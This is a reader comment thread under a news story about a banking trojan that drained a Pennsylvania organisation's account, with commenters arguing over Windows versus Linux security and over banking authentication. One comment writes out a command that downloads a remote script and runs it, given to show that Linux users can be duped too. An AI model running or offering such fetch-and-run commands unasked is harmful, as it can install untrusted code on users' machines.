back to article Trojan plunders $480k from online bank account

A Pennsylvania organization that helps develop affordable housing learned a painful lesson about the hazards of online banking using the Windows operating system when a notorious trojan siphoned almost $480,000 from its account. News reports here and here say $479,247 vanished from a bank account belonging to the Cumberland …

COMMENTS

This topic is closed for new posts.
  1. Anonymous Coward
    Linux

    see icon :-)

    Type your comment here — plain text only, no HTML

  2. Alan_Peery

    Token circumvented -> retries -> why not detected?

    Any details on the circumvention of the "clearing house token" ? This sounds like an RSA style token to me, and the only way I know of to circumvent this is a brute force attack with many retries against the bank's systems. If this is the case, the bank should have detected these many failed login attempts, and may arguably be at fault for the emptying of the bank account on this basis.

  3. Anonymous Coward
    Anonymous Coward

    Put your head in the sand , thats helping

    Your article is a defeatist piece of crap, I have been using online banking for over 10 years and not an issue.

    Maybe you should recommend patching, updating , using antivirus, its the users not the operating system, locks can always be broken

    running away, I bet a five year old could give me that advice,

    what about ATM's , they get skimmed , stop using, what about cash people mug you. stop using.

    people steal your identity, give it up bury your head in the sand now thats an idea

    you really are an idiot, and I am sure that smug Apple users get screwed too, it's just Steve Jobs this doing it.

  4. b166er

    Easy to fix

    Why don't banks implement some sort of random mouse driven gesture that would be difficult if not impossible for a trojan to detect. My bank uses a PIN-like drop-down, but I figure it wouldn't be too hard to calculate the mouse-traveled distance and compute the number selected. Unless the numbers in the drop-down were arranged in a random order each time.

    Simples, no?

  5. Jacob Reid
    Gates Halo

    Not Windows' fault

    The problem there is known as 'human stupidity' - ie. opening random email attachments.

    Do people really still fall for that?

  6. Anonymous Coward
    Anonymous Coward

    i'd love to see...

    ...The state of a linux system administered by a guy who clicks random email attachment executables. No need for a trojan if you've got root...

  7. Mr. Barbour

    Windows is NOT the problem. I am in security, I know.

    The problem is not Windows, the problem is the end users. Most of the vulnerabilities that are exploited in the wild have a.) been patched and the user has not kept up on them, or b.) use a third party application to 'ninja' attack into getting control. One of your examples clearly states that the user had to download the file manually, which will bypass even the best security. It is a social engineering attack, they prayed on the users ignorance and capitalized on it. I am an IT professional who specializes in security and viruses. It is also a numbers game, if 95% of the world used Macs or Linux even, the hackers would target them as well. As a matter of fact, I came across an article the other day that offered $.43 for every bot infected Mac that someone could produce to them. Simply switching operating systems will never do the trick, education to users on how to avoid infecting their PCs or how to perform regular scans, keep the OS patched, patch all third party applications, replace end of life applications, and even upgrading the the newer versions of windows. A little common sense and self-education goes a long way in mitigating these types of scenarios. I support thousands of end users everyday, and the biggest problem is them going to infected sites (drive-by malware attacks) and downloading files that are not legitimate. I understand that learning this stuff is hard, but as we become more dependent on computers, people will have to learn how to defend themselves. Using up to date Anti-virus programs in addition to running Spyware removal programs can take care of a lot of these. There are some extremely effective FREE software out there to help with this. I use a set of 4 or 5 FREE programs to clean peoples PCs that get brought to me that are infected. After I give them their computer back, with a little training (and I mean very minimal, basic stuff...click here, then click here kind of stuff) they usually do not get infected again unless they stop keeping things up to date. Fact is that most companies are presented with the vulnerabilities ahead of time and are warned to patch it, which most do. Microsoft is VERY good at this. The problem is that most people find it 'annoying' or 'inconvenient' to do so and let it slide, and the result is losing a lot of money. My guess is that the Cumberland Housing Authority does not have an IT department, or get routine monthly maintenance done to make sure that their PCs are not infected. If they do, then they need to get a different company, such as mine (shameless plug here...Certeks Computer Consultants) to do a better job. I personally oversee Accountant offices, Lawyers offices, Doctor offices, and many more that have very confidential information that cannot be leaked and keep them secure for only a few hours of work per PC per month, some not even that much. The users can run the same scans I do for FREE, but do not want to be bothered. Do not blame Microsoft, it is strictly because when malware authors want to write a virus, would you go after 10 people or 1,000,000 people? The answer is obvious, so if everyone dropped Windows for another operating system, eventually the same thing will have to be done with those. I personally would rather stick with the company that has been in the game fighting this stuff from the beginning rather than switch to a company that doesn't even recommend trying to protect yourself and has no experience defending from these. It is like picking the new guy over the seasoned veteran.....It is a mere knee-jerk reaction that would accomplish nothing, but making things worse, as people will automatically think they are safe when in fact they are not. Man-in-the-middle attacks do not care what OS you are using, that takes your data straight off the cable, no infections necessary (to a point, security guys back off I am trying to keep it simple). What about your phone? Those are not completely safe either. With an RFID scanner I can walk by you and steal all your card information in your wallet. Please, do not hop on the 'I hate Microsoft' band wagon without doing some research and talking to the experts.

  8. frymaster

    pointless advice

    the kind of people who will both see and follow this advice are the kind of people who don't click on random email attachments. And like david w, i'd love to see them try

  9. Antoinette Lacroix

    @David

    As said before, by thousands of people a million times: "On *Nix, nothing that is downloaded is executable."

  10. Alex 3
    Thumb Down

    Flawed

    Flawed article....

    Hey folks - if you don't want to be involved in a plane crash then don't go flying - and also make sure the captain doesn't do the checks before you fly either. Therefore all planes = bad.

    Right on....

  11. Frumious Bandersnatch
    Thumb Down

    @Antoinette Lacroix

    > On *Nix, nothing that is downloaded is executable."

    Not quite true. Haven't you seen stuff like:

    wget http://example.com/progs/script.sh && sh ./script.sh

    Plus, just because you download a tarball and do sh ./configure && make, does that really mean that you've examined the code to make sure that no evil was lurking within? Or, indeed, have you actually set your umask so that downloaded files *don't* have the executable bit set?

    I know I'm being pedantic, and almost beside the point. But don't rule out the possibility of doing stupid things on *nix systems either. You don't have to go as far as Denis Ritchie's Reflections on Trust to come up with ways of duping a *nix admin. The smug attitude that you're above such deceptions as tainted downloads or that your machine is practically immune to viral code could be the fatal step before your downfall...

    To be fair to Microsoft here, it's pretty clear that user stupidity or momentary lapse of judgement on their part is the main problem. Put these users on a Linux or BSD system, and you'll still see them falling for tricks like I mentioned above.

    That's not to say that I agree with the article, mind. It's a pretty pathetic piece of trollbait, if you ask me. I'm not saying that MS doesn't deserve flak for its laissez-fair attitude to security, but why doesn't the article heap equal blame at the foot of the banks? Trollbait, as I said...

  12. Anonymous Coward
    Anonymous Coward

    Hmmm I'd go for this

    Lets just have a "LiveCD"/USB image that is distributed/certified by the major banks. That way they couldn't go blaming customers for client security.

    Oh wait. Silly me.

  13. Jodo Kast
    Thumb Up

    Oh so those are Windows fan boys

    I was wondering who would defend an operating system it is so riddled with security holes that they just had their biggest patch Tuesday ever.

    Then I recalled the 'Windows Fan Boy' thing. They do seem like apologists for an insecure operating system.

    The fact is: if you want to do secure online banking, don't use Windows. If you dispute the fact, look at the numbers for clarification.

    Excuses for why the numbers are coming up so bad for Windows are just excuses. Sure there are lots of excuses that research will find, but it doesn't change the facts much.

  14. adnim

    Windoze is the problem...

    As is Linux, OSX and any other OS. Windows is more of a problem than other operating systems because it runs on over 80% of the worlds desktop PC's. Coders are human, they make mistakes. Any software with more than a few thousand lines of code is likely to be flawed.

    Most Computer users see PC's as a consumer device and expect their PC's to run and be as safe to use as a TV set, they trust their computer as they trust other consumer devices. Microsoft, Apple and developers of Linux distro's make no effort to discourage this trust as they all simplify the use of their products and extol their virtues.

    Anti-virus software is not a solution, a recent email I received purporting to come from HM Revenue and Customs invited me to download and run my tax statement. This tax statement, an executable, was infact a zbot variant detected by only one of the virus scanning engines used by Jotti's malware scan that's 1 out of 22. I use Avast! that did not detect it.

    Linux is safer than Windows but only until it has dominant market share, then someone will work out a way of infecting a Linux system without root access. I use Linux, I prefer Linux, but I am under no illusion. I subscribe to Full Disclosure and the number of exploitable vulnerabilities in OS software is at least comparable to the number of exploitable vulnerabilities in commercial products. The difference is that on the whole, they do get fixed quicker.

    Security begins and ends with the user and the sooner developers admit that they cannot guarantee security of their code, and that ALL their products are a liability, the average user will continue to trust their computer as they trust their TV. This needs to change. Just like a packet of cigarettes carries a health warning, software packaging should also carry a warning stating that use of this software could result in severe financial loss. Maybe then users might just be a little less trusting.

    I would say do not use Windows for anything other than playing games and as a media center because that is all it is fit for. And, when Linux has a much larger user base it won't be much better than windows from a security perspective either.

  15. Robert Hill
    Terminator

    Good advice...

    I have owned PCs and been online since 1982, and I always recommend to people to NOT use online banking, regardless of OS. Call the bank, it is WAY harder to get hacked that way...banks hate it because it costs more to them than online, but what matters is the safety of your money...

  16. Anonymous Coward
    Linux

    But some banks' online sites don't play well with Linux

    I can attest that some banks have sites that doesn't play well with Linux. One particular bank I use has a site that keeps stalling and timing out under Firefox in Linux, but on the exact same version of Firefox in Windows it works fine.

  17. Charles 9

    Then how do you guard....

    ...against a zero-day cross-platform drive-by attack slipped into a trusted website (even here)? Financially- or politically-motivated hackers are some of the most motivated in existence, so they'll resort to ANYTHING to get their malware across--even develop something truly novel, like a cross-platform zero-day malware that slips through even NoScript or the like.

  18. Anonymous Hero
    FAIL

    @adnim

    "I would say do not use Windows for anything other than playing games"

    1. Is that because no-one can be arsed writing games for a bunch of tight fisted opensource wankers who'd never pay to play on their 0.1% desktop penetration OS?

    "and as a media center because that is all it is fit for. "

    2. So I'm guessing you've not been able to get a cheep out of the fucked up monstrosity that is the linux audio system(s).

    "And, when Linux has a much larger user base it won't be much better than windows from a security perspective either."

    3. Man you guys are so optimistic it makes me weep.

  19. Big-nosed Pengie
    Linux

    @"the problem is not windows"

    Bullshit. Let's use an analogy...

    Motor car X is poorly-designed and constructed and known to regularly crash and burn, killing its occupants and, often, innocent pedestrians. Most of the times a crash happens the manufacturer issues a recall, and anyone who has the fix applied every time a recall is issued is a little better-protected than the 95% of owners who never respond to the recall notices.

    Motor car Y is well-designed and constructed and, while not completely immune to crashes, hardly ever does due to its inherent design and construction qualities. (Drivers still run into trees, of course.)

    Which one are you going to drive?

  20. Andy Goss

    Running as Administrator

    I gather almost all domestic Windows PCs run as Administrator. Buy a pre-configured Windows box and it will have the one, all-powerful user. From what I have read it looks like Vista had a heap of extra control stuff added to it to try and get round the problem, which people found very irritating. Any Linux distro will have a root user, even if you can't actually log in as root, to quarantine administrative functions. I'm sure that when Linux achieves a critical level of market share the crooks will devote time to it, but it remains an inherently far more securable OS than Windows, which was originally designed as a single-user, stand-alone OS, and, due to the marketing imperative of continuity, has what amounts to severe genetic defects passed on from version to version. If Bill Gates had known what he was creating, I bet he would have taken more trouble over it.

  21. Anonymous Coward
    Anonymous Coward

    Hmmm

    I've used online banking on Windows for many years without any issue... but then I don't click on attachments (and have educated my wife not to either), and in addition to running Anti-virus I also run other malware scanners regularly.

    As so many others have pointed out, it's not specifically a failing with Windows, just a failure of users to think about what they're doing.

  22. Anonymous Coward
    Anonymous Coward

    This bozo should be fired at once and sue by MS

    It's idiots who should not even have access to a computer who are the problem, not windows.

  23. seatrotter

    Just wondering...

    Doesn't any of those banks involved, have any options for authenticating transactions? How about those companies involved, don't they look for banks that authenticates transactions, and opt for such a service?

    The simplest transaction authentication (I can think of) is, for a transaction to complete, by sending a text message (from the bank) to the account owner? Containing either an additional challenge code, or by having the recipient text/call back? Of course, this could be rendered useless if, say, changing of phone number is not properly/securely handled.

  24. elderlybloke
    Linux

    By Mr. Barbour Posted Wednesday 14th October 2009 22:32 GMT

    Dear Mr .Barbour,

    If the post was given with some paragraphs to separate the mass of words , I may have read it..

    Kind regards.

  25. Mark G Forbes
    WTF?

    Freeware virus scanners and such?

    I see reference above to freeware tools for cleaning and inspecting Windows PCs. I'm aware that such tools exist, but I also know that fake tools of this type are a prime vector for malware. So how does one determine which tools are in fact 'safe', and which ones are scams? I've been careful and so far have managed to avoid infection, so far as I know, by implementing a reasonable degree of paranoia. An e-card, no matter from whom, is automatically assumed to be fraudulent. I delete most forwarded stuff un-opened if it has links in it that go somewhere I don't recognize, and I run Firefox with NoScript and a lot of 'features' turned off.

    Any advice from those who know?

  26. Sitaram Chamarty
    FAIL

    it *is* windows...

    windows was (re-(re-))built from the ground up as a multi-user addon to an inherently single user system. A Linux desktop is going the other way, so there's a lot of security already in there in terms of separation.

    @David W ("No need for a trojan if you've got root...") -- clicking on an attachment does not execute anything, and even if desktops become like that (some are, sadly) they won't execute as root.

    @Charles9 ("malware that slips through even NoScript") -- can you show me an example of anything that slips through NoScript? I haven't seen one yet

  27. MacroRodent
    Boffin

    Its not only Linux vs Windows, its persistence of infections

    The key thing is using a live CD or other method that ensures the computer starts from a totally clean slate and then connects to the bank!

    If Windows had live CD:s like this, they could be used as well. But I guess the live CD concept is hard for Microsoft to integrate into their OS, or at least their business model. Here Linux wins.

    Note that using a fresh Linux or a Windows installation in a virtual machine would NOT help; a Trojan on the host OS could be stealing your keypresses anyway. You really need to boot physically.

  28. Anton Ivanov
    Boffin

    Re: Easy to fix

    That is called virtual keyboard. Not particularly successful. A couple of American banks had that introduced 2-3 years back and it was dealt with very fast.

    The only two systems so far which have been successful in eliminating banking fraud 100% are:

    1. Using smartcards for authentication _AND_ signing each transaction with the smartcard. Popular in jurisdictions with high hacking pressure like SA, Eastern Europe, etc. You get a an internal browser popup which shows what you are signing for and asks you for the smartcard and its pin every time. If you got one of the readers with pin entry on the reader itself the system is totally bombproof. If not, it is still generally better than most banking auth currently in use in the western world. It has the side bonus that it makes use of digital sigs so you can actually sign any document not just transaction.

    2. Using the debit card as a smartcard to sign every transaction. Used by Nationwide in the UK. You are given a couple of numbers to punch in the reader and the reader generates a hash. No fraud period. Which is not surprising as it is effectively a sneakernet - there is no physical connection between the machine and the reader.

  29. MDR
    Black Helicopters

    The banks don't help

    Over and over, end users are told "Don't click on email links... especially ones that want you to sign on." And then what do the banks do? They send emails (HTML format, of course) with a nice button labeled "Sign on now".

  30. Filippo Silver badge
    Stop

    @Linux fanbois

    I don't understand why you keep repeating the argument that this happens because Windows is "full of holes". The article clearly states that the user executed an unverified attachment, probably while running as admin. On Vista, he also had to either explicitly disable UAC or ignore one or more warnings. No OS bug was used. A similar attack against a similarly-clueless user would have worked on either Linux or Mac, if only hackers bothered to target these systems.

    Oh, wait, yeah, I do understand - smug elitism combined with not having actually read the article.

    FFS, the actual solution to the problem should be patently obvious - switch to a bank that uses one-time-only passwords for online operations.

  31. Jonathan 6

    @ Bozo

    Quote:

    This bozo should be fired at once and sue by MS #

    By Anonymous Coward Posted Thursday 15th October 2009 04:52 GMT

    It's idiots who should not even have access to a computer who are the problem, not windows.

    It's clear to me that the only idiots here are the ones jumping up to defend Windows as they clearly haven't got a FUCKING clue and haven't read the original articles by Krebs. Man, you Wintards truly take the biscuit when it comes to defending the indefensible. READ THE ORIGINAL ARTICLES. Don't rely on El Reg tor report them either accurately or with reference to all the facts. Haven't you idiots learnt anything?

  32. Anonymous Coward
    Stop

    @Big-nosed Pengie

    Blah blah blah old 'if Windows was a car' joke recycled ...

    Then the truth of the matter:

    > Drivers still run into trees, of course.

    Frumious Bandersnatch has aleady given one example of a downloadable linux infector, and there are loads more around.

    *People*, not operating systems, click on unsafe links and download trojans.

    If linux ever manages through some bizarre tragic accident to get any sort of desktop and home user market penetration, we will see the proliferation of malware for linux: and the only upside of that will be that it'll be hilarious to watch the l33t linux g33k5 suddenly changing their tune ...

  33. Anonymous Coward
    Megaphone

    Its so simple though really..

    Keep your OS patched.

    Keep your apps patched (secunia)

    Use key scrambling software (google it, i use QFX)

    Run your AV.Malware scanner DAILY.

    Stop clicking on email attachments

    Type the banks URL in yourself (ie, dont follow links)

    And finally, SOMEONE THINK OF THE USERS. EDUCATION EDUCATION EDUCATION.

    There. Simples. (no, i cant do the cute squeak)

  34. Big Al
    Gates Halo

    Check? What?

    "Contrary to what banks say, writing checks really isn't that much of a hassle, at least if you don't write that many of them."

    You're lucky to live in a country where that is actually an option. Many, including the one I live in, have banking systems that have jumped straight from being cash-only to all-virtual without stopping at the check/cheque on the way. And all the banks here are owned by multinational banking houses, too.

    As to evading systems... my local bank sends a unique session code to my mobile phone whenever I want to do anything on my account. This means that anyone wishing to impersonate me and do more than just look at the figures must have my certificate (or access to a copy), AND my password, AND my mobile phone SIM card.

    I was one of the first people to browbeat my local bank into allowing me to have online banking access - it was so new back then that the branch staff didn't have a clue. The only time I've had problems since was with my UK bank paying out to someone who'd hijacked a trade website I did business with - and even then they refunded both quickly and without quibble.

    Of *course* any machine used for online banking purposes should be swept, cleansed, detoxed and whatever on a very regular basis indeed - but that's true whatever the operating system. I'm no great fan of Windows, and certainly not of Microsoft, but blaming the OS in this case is just ridiculous. So I shall use the rarely employed St Bill icon in revenge!

  35. David Barr

    The problem is American Banks

    As an alternative to not using Windows people could instead use a decent online banking service if they heve large amounts of money in their accounts.

    Asking for parts of a security number rather than the whole number is enough to thwart most trojans. That is suitable for personal banking, although in time those little security "calculators" will be needed.

    For business banking or people with large assets then the "calculators" or the small "random number" machines completely defeat keylogging, even if the keylogger manages to work out the security number after a dozen logins.

    Why don't American Banks use them? Because banking is different in America. There's lots of little inefficient banks, compared to the UK where there are less banks, but they're all big.

  36. The Original Ash
    FAIL

    @Big-nosed Pengie

    Your analogy is FUD. Shut up.

    Microsoft Windows is at fault because xp issues "admin by default" user accounts, up until Windows Vista.

    The rest is user error. Idiot computer users who download and install patches regularly, who download and run "superscreensaverboobies.exe" from an anonymous email, or who suffer drive-by attacks from poorly configured browsers (My pr0n won't load! I need unsigned ActiveX and Javascript to run it! AMAGAD OPEN OPEN OPEN!). Note that it could be IE, Firefox, Opera; They'll all do it if told to by the USER.

    Your analogy is not accurate. What it should be is:

    Motor car X is the most popular model on the market. Everyone can get it, it's easy to refuel, service, and comfortable to drive. It almost drives itself. The trouble is people take this for granted, and let it run away sometimes, causing accidents. It also has an idiots guide to tuning the engine, meaning folks who know about it can get the best performance, but idiots who use it end up wrecking the engine and costing themselves lots of money. Because there are more on the road of this model, there are more accidents. It's a direct correlation. These cars are also have an automated tool to bypass the immobiliser, but this is broken every month or so (Every second tuesday, actually) which means the bad guys need to update too.

    Motor car Y is a kit car. It comes in a default configuration which runs 99% of the time, but it starts with a rattle that the owner doesn't like. He also notices that the headlights, indicators, and rear wiper don't work immediately. There is no idiot guide to maintenance; He has to ask other owners. These owners reply with "OMGLULZ U R N00BX0rZ GO BACK TO CAR X, TARD!" and shun him. He is left to read documents written by people who more than likely have qualifications in automotive maintenance. He has difficulty understanding it, and gives up. Car X was so much easier to drive.

    Get it?

  37. MonkeyBot

    @Big-nosed Pengie

    But car X is red and shiny and goes faster so it's better.

  38. Al fazed
    FAIL

    Virtual stupidity

    Don't tread in it or you will have ..........

    Has anyone looked at Ubuntu 9.04 yet ?

    Talk about bloat ware, it's reminiscent of MS Windose these days.

    I mean, do I need to have MySQL, PHP, Python, C, C++, and God knows what else, installed by default ?

    No I don't !

    What do they do ?

    Make it so someone that it's possible for a person not on your machine to use them, if they know how.

    How do you stop them, if you weren't born with Penguin blood ?

    You can't ! Or you have a long uphill climb where the terrain changes as fast as the English weather.

    I think Linux fans need to shut up and read a book some times.

    That would help us none penguin blooded folks arrive at a solution without all the PROPAGANDA getting ion the way.

    Don't get me wrong. I hope there is a Linux solution, but genuine penguin heads ain't got it.

    Thanks Mark.

    ALFAZED

  39. Neil Barnes Silver badge
    Boffin

    The point was made both earlier and in the article

    Use a live-boot CD. (Or probably better and more convenient - though I don't know if such a thing exists - a live-boot USB *ROM*)

    That way, it doesn't matter what's polluting your computer; the main hard drive is never touched and you know that the same OS and code is running first time every time. There will never be an issue of downloaded viruses[1] - except in the original image, and that would be known about pretty quickly - since the only thing you would ever use this for would be to talk to your bank. No cookies either, come to think about it, beyond the session.

    At the moment, the only live CDs are (I think - I stand to be corrected) Linux variants, but that's neither here nor there; I'm sure if MS got together with the bank they could get a minimal OS approved by the banks and delivered on a read only medium. It doesn't need much more than a minimal screen driver and browser... hmm, something for Android?

    Yes, you would need to configure your internet every time you used it, but so what? How much is your bank account worth, vs a couple of minutes of your time?

    [1] I suppose there's a possibility that some bright spark might come up with a virus which can burrow into the bios eeproms of the various common motherboards and be capable of recognising a CD/USB boot as an interesting one to sniff at... but how much use is made of the bios once the boot has started?

  40. Jay Castle
    Grenade

    @ Big-nosed Pengie

    Crap analogy. A more accurate one would be:

    Motor Car X is the most popular car in the world, owned and used by 80% of the worlds population. If anyone, anywhere is going to do some driving, the vast majority of them will use this car. It has reasonble security, if correctly administered by the driver, but will always be open to theft if the driver doesn't follow sensible precautions and lock the damn doors.

    Motor Car Y is another motor car, that some feel is just as good as X but is only used by a very small number of drivers for various marketing reasons, not the least of which is that it hasn't been around as long as X. The security on this car is comprable to that of X, however the drivers of Y tend, because of it's nature as a smaller, less popular car to be hobbyists or enthusiasts and spend more time fiddling with the system to make it work better. In addition, because of it's niche market, thieves have found it more profitable to target X instead of Y.

    If you were to do a study on the number of thefts of property from Motor Car X or Motor Car Y, would you be at all suprised to learn that the majority of thefts occur from X, rather than Y?

    No, didn't think so.

  41. Joe 35
    Stop

    "but then I don't click on attachments "

    Doesn't matter. Visit a compromised website (which may be reputable, not just dodgy porn/warez) and you've been done. Just visit them as a Windows user and you've been infected. http://www.theregister.co.uk/2008/10/31/sinowal_trojan_heist/

    As for those who say that its all down to dominant market share, tosh and piffle. Do they think there is something magical about market share that makes it technically possible to break in once a system attains a high enough percentage? If *nix could be broken easily, it would have been done already, irrespective of market share.

    Mac users, with no virus protection, and presumably on average higher net worth as they can afford the Apple Tax, are already much more lucrative targets than Windows. Yet number of Mac viruses=zero, Mac trojans=2. That's not because no one can be bothered to attack the systems, its because, so far, they have proven much more secure, by design.

  42. Daniel Wilkie
    Gates Horns

    @Big-nosed Pengie

    Not wanting to cause agggro, but perhaps in this case the example slightly misses the mark...

    A better example would be:

    Car X is poorly designed and constructed and fragile, but strangely popular. Many VIP's who use them get assassinated.

    Car Y is well designed and tough but very few people use it. An even smaller percentage of those get assassinated.

    You'd take Car Y of course. And then when everyone has Car Y, said assassins would just develop ways to destroy Car Y.

    OK my analogy isn't perfect, but more accurate to the situation don't you think? Your example implies that Windows crashes and then hacks all the banks and steals everyones money (which it may well do tbh)

  43. raving angry loony

    fault?

    I see the Microsoft apologists are out in full force again.

    Here we have a company who is single-handedly responsible for the fact that users DO click on any and every attachment that comes their way, without providing any form of checking or security. Why? Because it was made ultra-convenient and for years was marketed as perfectly safe. This is a company that has, for 30 years, implemented a system that is completely insecure at its very core. A company that deliberately allowed user actions to affect core system resources without any form of restriction. A company that has continuously used its muscle not to push GOOD security, but to redefine what "good security" actually means. A company that does all sorts of security theatre, but continues to put out a product that can be so easily compromised.

    And it's not their fault? Pull the other one, it's got bells on.

    They've had a monopoly on the desktop for almost 30 years, since they (illegally) sold a product they did not yet own to the monopoly of the day. Instead of doing it right, they decided to do it any way that made the most profit - but certainly not the way that was best for consumers in the long run. This is just another example, and yes, lack of security and lack of protection for users IS their fault.

  44. Number6

    Users

    @Jacob Reid - It's not always the user at fault. If you've got a hacked website (where even the owner doesn't know it's been got at), and a zero-day exploit, then the user doesn't need to do anything different today than what he did yesterday to get his machine compromised. Of course, this can happen to Macs and Linux machine just as much as Windows, but there will be less useful results because there are less of those out there.

    @b166er - when using the drop-down box I do sweep the mouse off to the side just in case. However, I believe the common work-around for fraudsters is a screen grab that shows what you've selected in the boxes. Not so suitable for automated hacking because someone's got to interpret the image, but still valid.

  45. Tom 7

    It IS MS fault

    Why - cos they tell you computing is easy. They make a fortune out of selling something that is made easy for you to use. For easy read 'as secure as a fishnet condom'.

    Sure some people use 'easy' versions of Linux as root cos they think computers should be easy after MS told them it should be. Sheep! Living the MS lie.

    Computing with MS is like buying an electrically powered exercise bike. Might impress the neighbours but its only going to cost you money and get you nowhere in the long run.

    You want secure computing? Dont expect to be able to buy it off the shelf. Dont expect it to be easy. Dont expect it to be MS.

  46. Daniel 1

    Oy! Troll-bait!

    All I'll add to the hopeless hubbub, the this story will attract, is that if you think "there's no way to know your Linux machine isn't compromised, either", then its because you can't be arsed looking. Describe to me the circumstances, under which a Linux owner would be unable to find out if there was something nasty lurking on their machine? You may think it bad, you may think it good, but the one thing you cannot argue about with Linux is that it gives you total control, if you can be bothered taking it.

  47. Jess

    Windows IS the problem, but not for the reasons most people seem to think.

    The problem is two fold.

    1. Abysmal out of the box configuration (which is significantly improved for the versions of windows that no-one wants for other reasons).

    Running with admin rights???

    2. Bundled Unsafe web and email programs.

    Any HTML based email system is far more vulnerable to phishing and trojans than a plain text system. It is easy to make an email look like a corporate one and embed links that go to somewhere other than they indicate. And if someone is expecting an email they may get caught out. (I very nearly did once, on a web based email system, I never use HTML normally).

    Internet Explorer is very vulnerable.

    I doubt any of those compromised were using firefox with noscripts and an email client set to only use plain text. (Or a firewall configured to achieve the same end result.)

    The blame is the way it is packaged. And for corporates the blame is for hiring people too stupid to understand this and re-do it properly. (if they *insist* on using windows).

    That is why I am dissapointed windows 7 still comes with IE.

  48. Estariel

    Vm?

    Anyone looked at using a dedicated VM guest for online banking, and doing all email, web surfing, risky activity in a different guest?

  49. Anonymous Coward
    Anonymous Coward

    Not this old chestnut

    "(And yes, as Apple's market share continues to rise, it's likely OS X will be targeted. We can cross that bridge when we get to it.)"

    AAAARRRGGHHHH.

    You've been saying this for 8 years. Market share is such a minor part of it - if OS X was so easy to crack, all it would take would be a trojan in an email attachment. Sure, less people would open it, but 35 million people is hardly not worth bothering with.

  50. alain williams Silver badge

    Not using MS Windows is good advice

    Look at the numbers: Linux users tend to not be prone to the problems that plague MS users.

    That is all that matters. Why is not important. Move to a Linux desktop and enjoy not having to always worry about infection.

    Many have said that when more desktops run Linux that it will fall prey to malware. I agree that there will be more attempts; however the whole design is inherently more secure. But to you it should not matter - you should be concerned about your security today and the best way of achieving that is to move to a Linux desktop. What will happen in the future is another thing.

    Don't get me wrong: I do keep my machines patched & up to date, that is easy under Linux.

  51. Andus McCoatover
    Linux

    Cheques...

    "Contrary to what banks say, writing checks really isn't that much of a hassle, at least if you don't write that many of them."

    Yep but here in Finland, we stopped using them seriously - oh - 25 years ago. I've never had a cheque book in Finland. Never even been offered one - all payments I make are online, either from home, or from a bar-code reader in the bank's foyer (which I never use - costs €2/month for the service)

    When I got my pension cheques from the UK, I had to go through a lot of form-filling - in the main Oulu branch, 3kM from home - to cash a £100 cheque. Took the famous "10 wurkin daze" and cost me £25 for the priviledge. Thank fuc*k the Equitable changed to Worldpay. Only £3 now...(Sigh)

    @big-nosed Pengie - were you referring to the Ford Pinto, as best satirised in the film "Top Secret"?

    Penguin icon, natch. I only use my mini-lappari (Asus 701/eeebuntu) for the bank. Plus my one-time pad access code, used with my memorised 7-digit customer number. Wanna see how it works? Try

    http://www1.nordea.fi/appx/solo/3/include/demo/pndemo/index.html and click the mouse icon.

    Not bad for a quid or so a month TOTAL bank charges...Now, that's real service.

  52. Mike007

    erm

    I think the problem is their security was based on a code from a hardware token - ok so that stops someone else logging in to your account, but if they've infected your computer then it doesn't stop them adding an extra payment to the list of actions you're doing

    why not something similar to what my bank does? instead of the hardware generating a token that can be used to do anything, make it generate a code that can only be used to verify that single transaction! if i want to send a payment to a new destination their website gives me a code, i type that in to my reader, and it generates a code to verify *that action* and no other - the reader also has the ability to verify specific transactions (supplier, and value) although so far they only use it to verify adding a new account to receive payments (although if they mitm that, then they can easily change it without issuing new hardware)

  53. adnim

    @Anonymous Hero

    I knew the flame bait statement regarding Windows being fit for nothing but games and media would spark such a reaction. At least your tears will quench the flames ;-) However I withdraw that statement because with draconian DRM windows isn't fit for media either. However it is excellent at running Cubase as well as allowing criminals to earn a bob or two.

    Ooooo, wankers and penetration in the same sentence, I'm getting hot.

    Linux audio works fine although it would work even better if hardware manufacturers wrote Linux drivers or released sufficient documentation to allow OS developers to leverage the best from their kit.

    I have cause to be optimistic, if Windows was secure and Linux easier to get working with obscure hardware I would have likely been a bus driver or gigolo perhaps.

    /removes tongue from cheek

    I like ducks, have you seen the way water flows of their back?

  54. Edwin
    Thumb Down

    What utter tripe

    All of this malware relied on THREE points of failure:

    - An insecure windows install

    - An idiot user

    - Banks with weak authentication

    I've been using online banking, antivirus AND windows together for nearly 10 years, and the only place this seems to happen is the US with usernames and passwords for account holders.

    Dutch banks use two-factor authentication, and I have yet to hear of a real-life case where this was hacked, despite many scare stories from security twits.

    Dan - I'm disappointed.

  55. Anonymous Coward
    Linux

    Windows is NOT the problem. I am in security

    re: "i'd love to see... #"

    "...The state of a linux system administered by a guy who clicks random email attachment executables. No need for a trojan if you've got root...", David W.

    Can you demonstrate opening an attachment on a Linux system that executes malware or a site that executes malware by clicking on an URL. Running as root is a non issue as the system is still usable running as standard user. In most systems it isn't possible to login using the GUI as root.

    -------

    re: "Windows is NOT the problem. I am in security, I know", Mr. Barbour

    "The problem is not Windows, the problem is the end users"

    Is it possible to configure a Windows desktop that don't require the end user to have admin access?

    "I am an IT professional who specializes in security and viruses"

    Can you right-now point me to a web site that I can get 'infected' by clicking on an URL, or a sample of an email attachment that does same, by clicking on the attachment icon. No other action required.

    "education to users on how to avoid infecting their PCs or how to perform regular scans, keep the OS patched, patch all third party applications, replace end of life applications, and even upgrading the the newer versions of windows"

    Users can't be bothered to waste their valuable time doing all that. Besides they can avoid it by one of those bootable CDs.

    "I support thousands of end users everyday, and the biggest problem is them going to infected sites (drive-by malware attacks) and downloading files that are not legitimate"

    Do you charge money for this 'support' ?

    "I personally would rather stick with the company that has been in the game fighting this stuff from the beginning rather than switch to a company that doesn't even recommend trying to protect yourself and has no experience defending from these"

    I personally don't understand why I have to pay extra off the top, to get a working computer that don't get infected by malware.

    ps: Doing AV scans on someone's desktop is not being 'in security' ..

  56. Isolated Penguin

    A Timely Article

    I was just called up to the main office to find out why a users Outlook was reporting errors. I found not an error, but 2 e-mail messages from "Support" claiming that their version of MS Outlook, she is running Thunderbird, was mis-configured and that they needed to run the attached install.zip file to correct it. Another virus obviously. Had this user followed the instructions I am sure that part of my day tomorrow would be spent cleaning up the users system.

    This is even more of a concern to me because here in Korea you can not do any on-line banking or anything else without using Internet Explorer and at least half a dozen ActiveX Crypto, keyboard, screen, etc. plugins that may or may not actually protect the user. These plugins come from the institution, are installed in the background, and run without the users knowledge or any user intervention the site complains if the plugins are not in place.

    There was an article published in the Korea Times, one of the local English news papers, about the dangers to Korea of the Existing Microsoft mono-culture. http://www.koreatimes.co.kr/www/news/nation/2009/09/123_52401.html

